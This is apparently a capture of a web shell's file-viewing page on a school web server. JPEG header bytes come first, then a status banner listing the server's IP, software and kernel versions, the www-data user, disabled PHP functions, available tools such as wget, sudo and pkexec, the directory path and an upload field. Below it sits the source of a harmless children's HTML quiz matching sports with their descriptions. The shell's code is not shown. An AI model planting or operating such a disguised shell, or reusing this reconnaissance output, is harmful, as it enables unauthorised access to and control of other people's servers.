????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.135.224.139 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelE/Category3/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Circle the correct sports word</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> svg { position: absolute; background-color: transparent; } </style> <script> function page_preLoad() { s_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No3); s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.E, Category.No3, 25), true, true); s_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3', 'id_td_heading4', 'id_td_heading5', 'id_td_heading6', 'id_td_heading7', 'id_td_heading8', 'id_td_heading9']; var ids_tds = ['id_td1Set1', 'id_td2Set1', 'id_td1Set2', 'id_td2Set2', 'id_td1Set3', 'id_td2Set3', 'id_td1Set4', 'id_td2Set4', 'id_td1Set5', 'id_td2Set5', 'id_td1Set6', 'id_td2Set6', 'id_td1Set7', 'id_td2Set7', 'id_td1Set8', 'id_td2Set8']; var ids_All = ids_headings.concat(ids_tds); s_adjust_fontSize_for_ids_all_devices(ids_All, 80); var id_tables_array = ['id_table1', 'id_table2', 'id_table3', 'id_table4', 'id_table5', 'id_table6', 'id_table7', 'id_table8', 'id_table9']; s_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { setAllSvgsWidthHeightAndPositionFromTds(); setAllEllipseStyles(); } function setAllSvgsWidthHeightAndPositionFromTds() { var nTds = 2; for (var nthSet = 1; nthSet <= 8; nthSet++) { for (var nthTd = 1; nthTd <= nTds; nthTd++) { s_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet); } } } function setAllEllipseStyles() { var allEllipseIdsArray = getAllSetsEllipseIdsArray(); for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++) { var id_ellipse = allEllipseIdsArray[indexEllipse]; s_svg_setEllipseStyle(id_ellipse); } } function getAllSetsEllipseIdsArray() { var allEllipseIdsArray = new Array(); for (var nthSet = 1; nthSet <= 8; nthSet++) { for (var nthEllipse = 1; nthEllipse <= 2; nthEllipse++) { allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set' + nthSet); } } return (allEllipseIdsArray); } function ellipse_click(id_ellipse) { var set1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1']; var set2IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2']; var set3IdsArray = ['id_ellipse1Set3', 'id_ellipse2Set3']; var set4IdsArray = ['id_ellipse1Set4', 'id_ellipse2Set4']; var set5IdsArray = ['id_ellipse1Set5', 'id_ellipse2Set5']; var set6IdsArray = ['id_ellipse1Set6', 'id_ellipse2Set6']; var set7IdsArray = ['id_ellipse1Set7', 'id_ellipse2Set7']; var set8IdsArray = ['id_ellipse1Set8', 'id_ellipse2Set8']; var allGroupsIdsArrayArray = [set1IdsArray, set2IdsArray, set3IdsArray, set4IdsArray, set5IdsArray, set6IdsArray, set7IdsArray, set8IdsArray]; s_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray); } function btnValidate_click() { var allEllipseIdsArray = getAllSetsEllipseIdsArray(); var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse2Set2', 'id_ellipse1Set3', 'id_ellipse2Set4', 'id_ellipse1Set5', 'id_ellipse2Set6', 'id_ellipse1Set7', 'id_ellipse2Set8']; var nCorrectEllipses = s_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray); if (nCorrectEllipses == 8) { s_show_claps_animation('s_id_div_message'); } } function btnPrevious_click() { window.location = 'LevelECat3Lesson24.html'; } function btnNext_click() { window.location = 'LevelECat3Lesson26.html'; } function btnHome_click() { s_btnHomeCategories_click('LevelE'); } function page_onResize() { for (var nthSet = 1; nthSet <= 8; nthSet++) { for (var nthTd = 1; nthTd <= 2; nthTd++) { var eTd = document.getElementById('id_td' + nthTd + 'Set' + nthSet); var eTdRectangle = eTd.getBoundingClientRect(); var eCanvas = document.getElementById('id_svg' + nthTd + 'Set' + nthSet); eCanvas.style.left = eTdRectangle.left + 'px'; eCanvas.style.top = eTdRectangle.top + 'px'; } } } </script> </head> <body onLoad="page_onLoad()" onResize="page_onResize()"> <div id="s_id_div_message"></div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%"> <tr height="*"> <td align="center" style="padding-bottom: 0px"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading1" class="s_style_heading" style="border-bottom:none">Circle the correct word: </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading2" class="s_style_content_normal_padding_left" style="border-bottom:none">1. A sport in which a ball is hit over a net with a racket: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set1" class="s_style_textBlack" width="50%" style="text-align:center"> Tennis <svg id="id_svg1Set1" style="visibility: hidden"> <ellipse id="id_ellipse1Set1" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set1" class="s_style_textBlack" width="50%" style="text-align:center"> Hockey <svg id="id_svg2Set1" style="visibility: hidden"> <ellipse id="id_ellipse2Set1" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading3" class="s_style_content_normal_padding_left" style="border-bottom:none">2. Moving through water by moving arms and legs: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set2" class="s_style_textBlack" width="50%" style="text-align:center" > Skating <svg id="id_svg1Set2" style="visibility: hidden"> <ellipse id="id_ellipse1Set2" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set2" class="s_style_textBlack" width="50%" style="text-align:center"> Swimming <svg id="id_svg2Set2" style="visibility: hidden"> <ellipse id="id_ellipse2Set2" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table4" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" > <tr height="20%"> <td id="id_td_heading4" class="s_style_content_normal_padding_left" style="border-bottom:none">3. A game played with a ball in large field: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set3" class="s_style_textBlack" width="50%" style="text-align:center"> Football <svg id="id_svg1Set3" style="visibility: hidden"> <ellipse id="id_ellipse1Set3" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set3" class="s_style_textBlack" width="50%" style="text-align:center"> Running <svg id="id_svg2Set3" style="visibility: hidden"> <ellipse id="id_ellipse2Set3" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table5" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading5" class="s_style_content_normal_padding_left">4. Fighting with the fists: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set4" class="s_style_textBlack" width="50%" style="text-align:center"> Cricket <svg id="id_svg1Set4" style="visibility: hidden"> <ellipse id="id_ellipse1Set4" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set4" class="s_style_textBlack" width="50%" style="text-align:center"> Boxing <svg id="id_svg2Set4" style="visibility: hidden"> <ellipse id="id_ellipse2Set4" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table6" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading6" class="s_style_content_normal_padding_left" style="border-bottom:none">5. Riding a bicycle: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set5" class="s_style_textBlack" width="50%" style="text-align:center"> Cycling <svg id="id_svg1Set5" style="visibility: hidden"> <ellipse id="id_ellipse1Set5" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set5" class="s_style_textBlack" width="50%" style="text-align:center"> Swimming <svg id="id_svg2Set5" style="visibility: hidden"> <ellipse id="id_ellipse2Set5" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table7" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading7" class="s_style_content_normal_padding_left" style="border-bottom:none">6. Throwing a ball into a basket: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set6" class="s_style_textBlack" width="50%" style="text-align:center"> Hockey <svg id="id_svg1Set6" style="visibility: hidden"> <ellipse id="id_ellipse1Set6" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set6" class="s_style_textBlack" width="50%" style="text-align:center"> Basketball <svg id="id_svg2Set6" style="visibility: hidden"> <ellipse id="id_ellipse2Set6" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table8" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading8" class="s_style_content_normal_padding_left" style="border-bottom:none">7. Black and white checks board: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set7" class="s_style_textBlack" width="50%" style="text-align:center"> Chess <svg id="id_svg1Set7" style="visibility: hidden"> <ellipse id="id_ellipse1Set7" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set7" class="s_style_textBlack" width="50%" style="text-align:center"> Carom <svg id="id_svg2Set7" style="visibility: hidden"> <ellipse id="id_ellipse2Set7" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="12%"> <td align="center"> <table id="id_table9" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading9" class="s_style_content_normal_padding_left" style="border-bottom:none">8. A sport in which ball is thrown towards wicket: </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set8" class="s_style_textBlack" width="50%" style="text-align:center"> Rugby <svg id="id_svg1Set8" style="visibility: hidden"> <ellipse id="id_ellipse1Set8" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set8" class="s_style_textBlack" width="50%" style="text-align:center"> Cricket <svg id="id_svg2Set8" style="visibility: hidden"> <ellipse id="id_ellipse2Set8" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); </script> </body> </html>